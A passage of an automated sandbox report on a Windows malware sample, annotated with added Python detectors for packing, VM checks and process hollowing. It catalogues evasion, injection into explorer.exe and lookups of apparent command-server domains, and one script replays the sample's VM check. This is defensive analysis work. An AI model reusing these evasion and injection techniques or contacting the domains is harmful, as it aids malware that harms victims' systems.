            Source: C:\Users\user\Desktop\qhQ6armJ25.exe | Code function: 1_2_004025F7 pushad ; iretd 1_2_004025FA
            Source: C:\Users\user\Desktop\qhQ6armJ25.exe | Code function: 1_2_004029A6 push eax; ret 1_2_004029AE
            Source: C:\Users\user\Desktop\qhQ6armJ25.exe | Code function: 1_1_004025F7 pushad ; iretd 1_1_004025FA
            Source: C:\Users\user\Desktop\qhQ6armJ25.exe | Code function: 1_1_004029A6 push eax; ret 1_1_004029AE
            Source: C:\Users\user\AppData\Local\Temp\D380.exe | Code function: 4_2_01D23146 push eax; ret 4_2_01D2314E
            Source: C:\Users\user\AppData\Local\Temp\D380.exe | Code function: 4_2_01D22D97 pushad ; iretd 4_2_01D22D9A
            Source: C:\Users\user\AppData\Local\Temp\D380.exe | Code function: 4_2_01F24733 push ebp; ret 4_2_01F24734
            Source: C:\Users\user\AppData\Local\Temp\D380.exe | Code function: 4_2_01F1FB3B pushad ; iretd 4_2_01F1FB4B
            Source: C:\Users\user\AppData\Local\Temp\D380.exe | Code function: 4_2_01F24210 push edi; ret 4_2_01F24239
            Source: C:\Users\user\AppData\Roaming\gahfeaj | Code function: 5_2_004025F7 pushad ; iretd 5_2_004025FA
            Source: C:\Users\user\AppData\Roaming\gahfeaj | Code function: 5_2_004029A6 push eax; ret 5_2_004029AE
            Source: C:\Users\user\AppData\Local\Temp\D380.exe | Code function: 6_2_004025F7 pushad ; iretd 6_2_004025FA
            Source: C:\Users\user\AppData\Local\Temp\D380.exe | Code function: 6_2_004029A6 push eax; ret 6_2_004029AE
            Source: C:\Users\user\AppData\Local\Temp\D380.exe | Code function: 6_1_004025F7 pushad ; iretd 6_1_004025FA
            Source: C:\Users\user\Desktop\qhQ6armJ25.exe | Code function: 0_2_00420500 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_00420500
            Source: initial sample | Static PE information: section name: .text entropy: 7.04028491917
            Source: initial sample | Static PE information: section name: .text entropy: 7.02591971436
            Source: initial sample | Static PE information: section name: .text entropy: 7.04028491917
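The three entropy lines above are the report's packing indicator: a .text section at roughly 7 bits per byte is far denser than compiler output and usually means compressed or encrypted code that is unpacked at run time. The script below is an added example, not part of the report and not code from the sample: it reproduces the check with a minimal section-table parser (struct only, no pefile dependency) and runs it over a constructed in-memory PE with one pseudo-random section and one plain-text section. The 7.0 cut-off and the fabricated image are assumptions, not values taken from the analysis.

```python
"""Section-entropy check for packed PE files (added example, not from the report).

Parses the PE section table with struct alone, computes Shannon entropy per
section, and flags sections above a threshold.  build_test_pe() fabricates a
minimal PE so the check can run offline; the 7.0 cut-off is a common rule of
thumb and an assumption here, not a value from the analysis.
"""
import math
import random
import struct

PACKED_THRESHOLD = 7.0  # assumption: bits/byte above which code is likely packed


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for a constant buffer, 8.0 for uniform."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def pe_sections(image: bytes):
    """Yield (name, raw_bytes) for every section header in a PE image."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    file_hdr = e_lfanew + 4                      # IMAGE_FILE_HEADER (20 bytes)
    num_sections = struct.unpack_from("<H", image, file_hdr + 2)[0]
    opt_size = struct.unpack_from("<H", image, file_hdr + 16)[0]
    table = file_hdr + 20 + opt_size             # IMAGE_SECTION_HEADER array
    for i in range(num_sections):
        name, _vsize, _va, raw_size, raw_ptr = struct.unpack_from(
            "<8sIIII", image, table + 40 * i)
        yield name.rstrip(b"\0").decode("ascii", "replace"), image[raw_ptr:raw_ptr + raw_size]


def section_entropies(image: bytes) -> dict:
    """Map section name -> entropy for the whole image."""
    return {name: shannon_entropy(data) for name, data in pe_sections(image)}


def packed_sections(image: bytes, threshold: float = PACKED_THRESHOLD) -> list:
    """Names of sections whose entropy exceeds the threshold."""
    return sorted(n for n, e in section_entropies(image).items() if e > threshold)


def build_test_pe(sections) -> bytes:
    """Fabricate a minimal PE32 image from [(name, raw_bytes)].

    Only the fields pe_sections() reads are meaningful; the optional header is
    zero-filled and the image is not loadable.  Constructed test data.
    """
    e_lfanew, opt_size = 0x40, 224               # PE32 optional header size
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    file_hdr = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x0102)
    opt_hdr = struct.pack("<H", 0x10B).ljust(opt_size, b"\0")
    raw_ptr = e_lfanew + 4 + 20 + opt_size + 40 * len(sections)
    table, body = b"", b""
    for name, data in sections:
        table += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"),
                             len(data), 0, len(data), raw_ptr, 0, 0, 0, 0, 0x60000020)
        body += data
        raw_ptr += len(data)
    return dos + b"PE\0\0" + file_hdr + opt_hdr + table + body


def demo():
    """Constructed image: pseudo-random .text (stand-in for packed code) next to
    a plain .rdata section."""
    rng = random.Random(1337)
    packed = bytes(rng.getrandbits(8) for _ in range(4096))
    plain = b"Hello from an ordinary read-only data section\r\n" * 100
    image = build_test_pe([(".text", packed), (".rdata", plain)])
    return section_entropies(image), packed_sections(image)


if __name__ == "__main__":
    entropies, flagged = demo()
    for name, e in entropies.items():
        tag = "  <-- likely packed" if name in flagged else ""
        print(f"{name:8s} entropy={e:.2f}{tag}")
```

Entropy alone is a triage hint, not proof: resource-heavy or compressed-data sections score high for legitimate reasons, and the interesting case in this report is that the high-entropy section is .text, the one that should hold plain compiler output.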
            Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\gahfeaj
            Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\D380.exe
            Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\gahfeaj

            Hooking and other Techniques for Hiding and Protection:

            Deletes itself after installation
            Source: C:\Windows\explorer.exe | File deleted: c:\users\user\desktop\qhq6armj25.exe
            Hides that the sample has been downloaded from the Internet (zone.identifier)
            Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Roaming\gahfeaj:Zone.Identifier (access: read attributes | delete)

            Malware Analysis System Evasion:

            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: qhQ6armJ25.exe, 00000001.00000002.765854041.0000000001F40000.00000004.00000001.sdmp | Binary or memory string: ASWHOOK
            Checks if the current machine is a virtual machine (disk enumeration)
            Source: C:\Users\user\Desktop\qhQ6armJ25.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
            Source: C:\Users\user\Desktop\qhQ6armJ25.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
            Source: C:\Users\user\Desktop\qhQ6armJ25.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
            Source: C:\Users\user\Desktop\qhQ6armJ25.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
            Source: C:\Users\user\Desktop\qhQ6armJ25.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
            Source: C:\Users\user\Desktop\qhQ6armJ25.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
            Source: C:\Users\user\AppData\Roaming\gahfeaj | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
            Source: C:\Users\user\AppData\Roaming\gahfeaj | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
            Source: C:\Users\user\AppData\Roaming\gahfeaj | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
            Source: C:\Users\user\AppData\Roaming\gahfeaj | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
            Source: C:\Users\user\AppData\Roaming\gahfeaj | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
            Source: C:\Users\user\AppData\Roaming\gahfeaj | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
            Source: C:\Windows\explorer.exe TID: 2936 | Thread sleep count: 615 > 30
            Source: C:\Windows\explorer.exe TID: 1316 | Thread sleep count: 385 > 30
            Source: C:\Windows\explorer.exe TID: 1316 | Thread sleep time: -38500s >= -30000s
            Source: C:\Windows\explorer.exe TID: 3080 | Thread sleep count: 462 > 30
            Source: C:\Windows\explorer.exe TID: 3080 | Thread sleep time: -46200s >= -30000s
            Source: C:\Windows\explorer.exe TID: 6360 | Thread sleep count: 439 > 30
            Source: C:\Windows\explorer.exe TID: 660 | Thread sleep count: 281 > 30
            Source: C:\Windows\explorer.exe TID: 6364 | Thread sleep count: 282 > 30
            Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 615
            Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 385
            Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 462
            Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 439
            Source: C:\Users\user\Desktop\qhQ6armJ25.exe | Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\qhQ6armJ25.exe | System information queried: ModuleInformation
            Source: explorer.exe, 00000002.00000000.723940814.000000000A60E000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000002.00000000.724086765.000000000A716000.00000004.00000001.sdmp | Binary or memory string: War&Prod_VMware_SATAY
            Source: explorer.exe, 00000002.00000000.749875732.0000000006650000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000002.00000000.723940814.000000000A60E000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000002.00000000.724086765.000000000A716000.00000004.00000001.sdmp | Binary or memory string: War&Prod_VMware_SATAa
            Source: explorer.exe, 00000002.00000000.732593679.0000000004710000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
            Source: explorer.exe, 00000002.00000000.724086765.000000000A716000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
            Source: explorer.exe, 00000002.00000000.724086765.000000000A716000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
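The SCSI key enumerations and the VMware device strings above are two sides of the same check: the sample (and its persisted copy gahfeaj) walks HKLM\SYSTEM\ControlSet001\Enum\SCSI and treats the host as a virtual machine if a device instance ID names a hypervisor vendor, and the explorer.exe memory dump shows exactly the strings that walk would find on this analysis VM (Ven_VMware, NECVMWar). The script below is an added example, not the sample's code and not the sandbox's, that replays that decision over a constructed device list; the markers beyond the two VMware strings (VBOX, QEMU, Hyper-V's Msft Virtual) are my assumption for other hypervisors, and live enumeration through winreg only works on Windows.

```python
"""Replay of the SCSI-enumeration VM check (added example, not sample code).

looks_virtual() is the decision the sample makes after enumerating
HKLM\\SYSTEM\\ControlSet001\\Enum\\SCSI; enumerate_scsi_windows() reads the real
key on Windows, and the constructed lists below reproduce the device IDs the
report shows in explorer.exe memory so the check runs anywhere.
"""
import sys

SCSI_ENUM_KEY = r"SYSTEM\ControlSet001\Enum\SCSI"   # key as it appears in the report

# Case-insensitive substrings that mark virtual storage.  'vmware' and 'necvmwar'
# are in the report; the remaining markers are my assumption for other hypervisors.
HYPERVISOR_MARKERS = ("vmware", "necvmwar", "vbox", "qemu", "msft virtual", "virtual hd")

# Constructed from the report's explorer.exe memory strings.
REPORT_DEVICE_IDS = [
    r"Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000",
    r"CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000",
]
# Constructed stand-in for a physical host (vendor/product strings are made up).
BARE_METAL_DEVICE_IDS = [
    r"Disk&Ven_NVMe&Prod_Samsung_SSD_970\4&2f1a9c3e&0&000000",
]


def _subkeys(winreg, key):
    """Yield subkey names until EnumKey reports ERROR_NO_MORE_ITEMS."""
    i = 0
    while True:
        try:
            name = winreg.EnumKey(key, i)
        except OSError:
            return
        yield name
        i += 1


def enumerate_scsi_windows() -> list:
    """Return 'Device\\Instance' IDs under the SCSI enum key.  Windows only."""
    import winreg  # only available on Windows
    ids = []
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, SCSI_ENUM_KEY) as root:
        for device in list(_subkeys(winreg, root)):
            with winreg.OpenKey(root, device) as dev:
                ids.extend(f"{device}\\{inst}" for inst in _subkeys(winreg, dev))
    return ids


def looks_virtual(instance_ids) -> list:
    """Return (device_id, marker) pairs; an empty list means 'looks physical'."""
    hits = []
    for dev in instance_ids:
        low = dev.lower()
        hits.extend((dev, m) for m in HYPERVISOR_MARKERS if m in low)
    return hits


def is_sandbox_by_scsi(instance_ids=None) -> bool:
    """The sample's verdict.  With no argument, enumerate the live registry."""
    if instance_ids is None:
        if sys.platform != "win32":
            raise RuntimeError("live enumeration needs Windows; pass instance_ids")
        instance_ids = enumerate_scsi_windows()
    return bool(looks_virtual(instance_ids))


if __name__ == "__main__":
    for label, ids in (("report VM", REPORT_DEVICE_IDS), ("bare metal", BARE_METAL_DEVICE_IDS)):
        verdict = "virtual" if is_sandbox_by_scsi(ids) else "physical"
        print(f"{label}: {verdict} {looks_virtual(ids)}")
```

Two practical points follow from the report lines. The sample reads ControlSet001 literally rather than resolving CurrentControlSet, so vendor strings have to be neutralised in that key specifically; and because the same strings also sit in explorer.exe's memory (L341 onward), renaming the virtual disk and optical drive at the hypervisor level is more robust than patching registry values after the fact.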

            Anti Debugging:

            Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
            Source: C:\Users\user\Desktop\qhQ6armJ25.exe | System information queried: CodeIntegrityInformation
            Source: C:\Users\user\AppData\Roaming\gahfeaj | System information queried: CodeIntegrityInformation
            Source: C:\Users\user\Desktop\qhQ6armJ25.exe | Code function: 0_2_004202D0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_004202D0
            Source: C:\Users\user\Desktop\qhQ6armJ25.exe | Code function: 0_2_00420500 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_00420500
            Source: C:\Users\user\AppData\Local\Temp\D380.exe | Code function: 4_2_01D20042 push dword ptr fs:[00000030h] 4_2_01D20042
            Source: C:\Users\user\AppData\Local\Temp\D380.exe | Code function: 4_2_01F1D6AA push dword ptr fs:[00000030h] 4_2_01F1D6AA
            Source: C:\Users\user\Desktop\qhQ6armJ25.exe | Process queried: DebugPort
            Source: C:\Users\user\AppData\Roaming\gahfeaj | Process queried: DebugPort
            Source: C:\Users\user\AppData\Local\Temp\D380.exe | Code function: 6_1_00402679 LdrLoadDll, 6_1_00402679
            Source: C:\Users\user\Desktop\qhQ6armJ25.exe | Code function: 0_2_004202D0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_004202D0
            Source: C:\Users\user\Desktop\qhQ6armJ25.exe | Code function: 0_2_0041E390 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0041E390
            Source: C:\Users\user\AppData\Local\Temp\D380.exe | Code function: 4_2_0041FDD0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 4_2_0041FDD0
            Source: C:\Users\user\AppData\Local\Temp\D380.exe | Code function: 4_2_0041DE90 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_0041DE90

            HIPS / PFW / Operating System Protection Evasion:

            Benign windows process drops PE files
            Source: C:\Windows\explorer.exe | File created: gahfeaj.2.dr
            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\explorer.exe | Domain query: nalirou70.top
            Source: C:\Windows\explorer.exe | Domain query: privacytoolzfor-you7000.top
            Source: C:\Windows\explorer.exe | Domain query: xacokuo80.top
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\qhQ6armJ25.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Users\user\Desktop\qhQ6armJ25.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
            Source: C:\Users\user\AppData\Roaming\gahfeaj | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Users\user\AppData\Roaming\gahfeaj | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
            Injects a PE file into a foreign process
            Source: C:\Users\user\AppData\Local\Temp\D380.exe | Memory written: C:\Users\user\AppData\Local\Temp\D380.exe base: 400000 value starts with: 4D5A
            Contains functionality to inject code into remote processes
            Source: C:\Users\user\AppData\Local\Temp\D380.exe | Code function: 4_2_01D20110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess, 4_2_01D20110
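The call list for 4_2_01D20110 is a textbook process-hollowing (RunPE) chain, and the "Memory written ... base: 400000 value starts with: 4D5A" line is the same technique observed from the outside: D380.exe launches a second copy of itself (GetModuleFileNameA feeding CreateProcessA), unmaps the child's original image with NtUnmapViewOfSection, writes a fresh PE into the child starting with the MZ header at the image base, and resumes the child's main thread with a new context. The Python below is an added example, not code from the sample or from the sandbox: an ordered-subsequence matcher that flags this chain in an API trace, run over a trace constructed from the report's call list. Real API traces interleave unrelated calls, so the matcher requires order but not adjacency. The argument values on the write calls are constructed for the example; the report only gives the base and first bytes of one write.

```python
"""Detect a process-hollowing (RunPE) call chain in an API trace.

Added example; not code from the sample or the sandbox.  The chain is the
call order reported for D380.exe function 4_2_01D20110, and the trace below
is constructed from that list.  Real traces interleave unrelated calls, so the
matcher requires order but not adjacency.
"""
from dataclasses import dataclass, field


@dataclass
class ApiCall:
    name: str
    args: dict = field(default_factory=dict)


# One set per step; Win32 and Nt spellings are interchangeable at each step.
HOLLOWING_CHAIN = [
    {"CreateProcessA", "CreateProcessW", "NtCreateUserProcess"},
    {"GetThreadContext", "NtGetContextThread"},
    {"NtUnmapViewOfSection", "ZwUnmapViewOfSection"},
    {"VirtualAllocEx", "NtAllocateVirtualMemory"},
    {"WriteProcessMemory", "NtWriteVirtualMemory"},
    {"SetThreadContext", "NtSetContextThread"},
    {"ResumeThread", "NtResumeThread"},
]
WRITE_APIS = {"WriteProcessMemory", "NtWriteVirtualMemory"}


def match_chain(trace, chain=HOLLOWING_CHAIN):
    """Indices in trace where each step first matches, in order; None if the
    chain never completes."""
    hits, pos = [], 0
    for step in chain:
        while pos < len(trace) and trace[pos].name not in step:
            pos += 1
        if pos == len(trace):
            return None
        hits.append(pos)
        pos += 1
    return hits


def pe_header_written(trace, image_base=0x400000) -> bool:
    """True if a cross-process write places an 'MZ' header at image_base
    (the 'base: 400000 value starts with: 4D5A' observation)."""
    return any(c.name in WRITE_APIS
               and c.args.get("base") == image_base
               and c.args.get("data", b"")[:2] == b"MZ"
               for c in trace)


def hollowing_verdict(trace, image_base=0x400000) -> dict:
    """Combine the ordered chain match with the PE-header write check."""
    steps = match_chain(trace)
    return {"chain_complete": steps is not None,
            "steps": steps,
            "pe_header_written": pe_header_written(trace, image_base)}


# Trace constructed from the report's call list for 4_2_01D20110.  The report
# gives the base and leading bytes of only one write; the other write arguments
# here are made up for the example.
REPORT_TRACE = [ApiCall(n) for n in (
    "VirtualAlloc", "GetModuleFileNameA", "CreateProcessA", "VirtualFree",
    "VirtualAlloc", "GetThreadContext", "ReadProcessMemory",
    "NtUnmapViewOfSection", "VirtualAllocEx",
)] + [
    ApiCall("NtWriteVirtualMemory", {"base": 0x400000, "data": b"MZ\x90\x00\x03\x00"}),
    ApiCall("NtWriteVirtualMemory", {"base": 0x401000, "data": b"\x55\x8b\xec"}),
    ApiCall("WriteProcessMemory", {"base": 0x7ffdf008, "data": b"\x00\x00\x40\x00"}),
    ApiCall("SetThreadContext"), ApiCall("ResumeThread"), ApiCall("ExitProcess"),
]

# Constructed benign launch for contrast: no context swap, no unmapping.
BENIGN_TRACE = [ApiCall(n) for n in ("CreateProcessW", "WaitForSingleObject",
                                      "GetExitCodeProcess", "CloseHandle")]


if __name__ == "__main__":
    for label, t in (("D380.exe", REPORT_TRACE), ("benign", BENIGN_TRACE)):
        print(label, hollowing_verdict(t))
```

The two signals are deliberately separate: a loader that uses the Nt-level APIs directly or skips NtUnmapViewOfSection (mapping the payload at a different base) breaks the chain match but still trips the MZ-at-image-base check, and a tracer that does not capture write contents still sees the chain. In the report the target of the write is D380.exe itself, so a rule that only looks for writes into other images would miss this self-hollowing variant.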
            Creates a thread in another existing process (thread injection)
            Source: C:\Users\user\Desktop\qhQ6armJ25.exe | Thread created: C:\Windows\explorer.exe EIP: 4F01920
            Source: C:\Users\user\AppData\Roaming\gahfeaj | Thread created: unknown EIP: 3151920
            Source: C:\Users\user\Desktop\qhQ6armJ25.exe | Process created: C:\Users\user\Desktop\qhQ6armJ25.exe "C:\Users\user\Desktop\qhQ6armJ25.exe"
            Source: C:\Users\user\AppData\Roaming\gahfeaj | Process created: C:\Users\user\AppData\Roaming\gahfeaj C:\Users\user\AppData\Roaming\gahfeaj
            Source: C:\Users\user\AppData\Local\Temp\D380.exe | Process created: C:\Users\user\AppData\Local\Temp\D380.exe C:\Users\user\AppData\Local\Temp\D380.exe
            Source: explorer.exe, 00000002.00000000.712673606.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000002.00000000.731425992.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000002.00000000.745782073.0000000000AD8000.00000004.00000020.sdmp | Binary or memory string: ProgmanMD6
            Source: explorer.exe, 00000002.00000000.731701488.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.745995087.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.714471440.0000000001080000.00000002.00020000.sdmp | Binary or memory string: Program Manager
            Source: explorer.exe, 00000002.00000000.731701488.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.749862534.0000000005E50000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.745995087.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.714471440.0000000001080000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000002.00000000.731701488.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.745995087.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.714471440.0000000001080000.00000002.00020000.sdmp | Binary or memory string: Progman
            Source: explorer.exe, 00000002.00000000.731701488.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.745995087.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.714471440.0000000001080000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
            Source: explorer.exe, 00000002.00000000.738660675.000000000A716000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.759191918.000000000A716000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.724086765.000000000A716000.00000004.00000001.sdmp | Binary or memory string: Shell_TrayWnd5D
            Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: C:\Users\user\Desktop\qhQ6armJ25.exe | Code function: 0_2_00418430 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 0_2_00418430

            Stealing of Sensitive Information: